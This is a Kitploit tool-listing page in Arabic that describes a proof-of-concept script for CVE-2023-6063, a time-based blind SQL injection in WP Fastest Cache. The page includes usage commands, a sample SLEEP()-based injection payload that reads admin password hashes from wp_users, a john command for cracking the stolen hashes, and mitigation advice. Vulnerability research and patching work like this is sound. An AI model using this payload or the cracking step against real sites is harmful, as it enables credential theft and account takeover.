Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-6063-PoC — إثبات مفهوم لـ CVE-2023-6063، ثغرة حقن SQL أعمى زمني في WP Fastest Cache ≤1.2.2. | Kitploit
أدوات/GitHubGitHub/incommatose/cve-2023-6063-poc
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

إثبات مفهوم لـ CVE-2023-6063، ثغرة حقن SQL أعمى زمني في WP Fastest Cache ≤1.2.2.

عرض المستودع
2148منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات مفهوم لـ CVE-2023-6063: ثغرة حقن SQL أعمى غير موثقة في WP Fastest Cache 1.2.2

Static Badge Static Badge Static Badge

إثبات مفهوم لـ CVE-2023-6063، وهي ثغرة حقن SQL أعمى تعتمد على الوقت في WP Fastest Cache ≤1.2.2. تستخرج كلمات المرور المجزأة (user_pass) والبريد الإلكتروني (user_email) من جدول wp_users عن طريق إساءة استخدام كوكي wordpress_logged_in.

الميزات

  • استخراج البيانات بناءً على الوقت (حرفًا بحرف) عبر تأخيرات SLEEP().
  • تدعم الكوكيات المخصصة، وأسماء المستخدمين المستهدفة، والتحقق من التجزئة.

يقوم هذا البرنامج النصي باستخراج:

  • ☑️ تجزئات كلمات مرور ووردبريس (MD5/PHPass).
  • ☑️ عناوين البريد الإلكتروني المرتبطة.
  • وسائط سطر الأوامر لاختبار مرن (--just-hash, --just-email, --debug).

الاستخدام

قم بتثبيت التبعيات (إذا لم تكن مثبتة):

pip install -r requirements.txt

الاستخدام الأساسي:

python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

الخيارات الكاملة:

  -h, --help            show this help message and exit
  -u URL, --url URL     Full URL to Wordpress for testing CVE-2023-6063
  --username USERNAME   Define a user to extract its hashed pass
  -d DELAY, --delay DELAY
                        Time for wait web response default 5, minimum 2
  -H HASH, --hash HASH  Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
  --domain DOMAIN       Name of the domain for email validation
  -c COOKIE, --cookie COOKIE
                        Specify a cookie name if it's different on your context
  --status-code STATUS_CODE
                        Use a specific positive status code, default 200
  --debug               More verbosity
  --just-hash           Just extract hashed password
  --just-email          Just extract email value for a user

💻 عرض توضيحي

هذا عرض توضيحي للمستخدم admin

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

عند تسريب تجزئات كلمات المرور، استخدم john أو hashcat لفك تشفيرها باستخدام خوارزمية PHPass إذا كانت كلمة المرور ضعيفة.

مثال باستخدام john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ التفاصيل الفنية

📖 وصف الثغرة

إن إضافة WP Fastest Cache (≤1.2.2) لووردبريس معرضة لثغرة حقن SQL أعمى غير موثقة عبر كوكي wordpress_logged_in. يمكن للمهاجمين استغلال هذه الثغرة لاستخراج بيانات حساسة (مثل تجزئات كلمات المرور، عناوين البريد الإلكتروني) من جدول wp_users باستخدام تأخيرات زمنية (SLEEP()) في استعلامات SQL.

" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 إخلاء مسؤولية: استخدم هذه المعلومات فقط لاختبار الأمان الأخلاقي بتفويض مناسب. الاستغلال غير المصرح به غير قانوني.

  • معرف CVE: CVE-2023-6063
  • درجة الثغرة: 7.5 (عالية)
  • نوع الثغرة: حقن SQL (أعمى، زمني)
  • البرنامج المتأثر: WP Fastest Cache (إضافة ووردبريس) ≤ v1.2.2

🔍 ناقل الهجوم

  • قابلية الاستغلال: عن بعد (لا يتطلب مصادقة)
  • تعقيد الهجوم: منخفض (قابل للاستغلال عبر طلبات HTTP مصممة)

🔥 التأثير:

  • السرية: عالية (يسرب بيانات اعتماد المسؤول)
  • السلامة: لا شيء
  • التوفر: لا شيء

📌 الإصدارات المتأثرة

  • WP Fastest Cache الإصدارات ≤1.2.2

🛡️ التخفيف

قم بترقية WP Fastest Cache إلى إصدار >1.2.2.

  • قم بالترقية إلى WP Fastest Cache v1.2.3 أو أحدث.
  • طبق قواعد جدار الحماية للتطبيقات الويب (WAF) لحظر حمولات حقن SQL في الكوكيات.
  • عطل الإضافة إذا لم تكن قيد الاستخدام.

📚 المراجع

  • مدخل NIST NVD
  • تنبيه إضافة ووردبريس
  • تفاصيل CVE

⚖️ قانوني

  • هذا البرنامج النصي للأغراض التعليمية. احصل دائمًا على إذن صريح قبل الاختبار.
تنزيل الأداة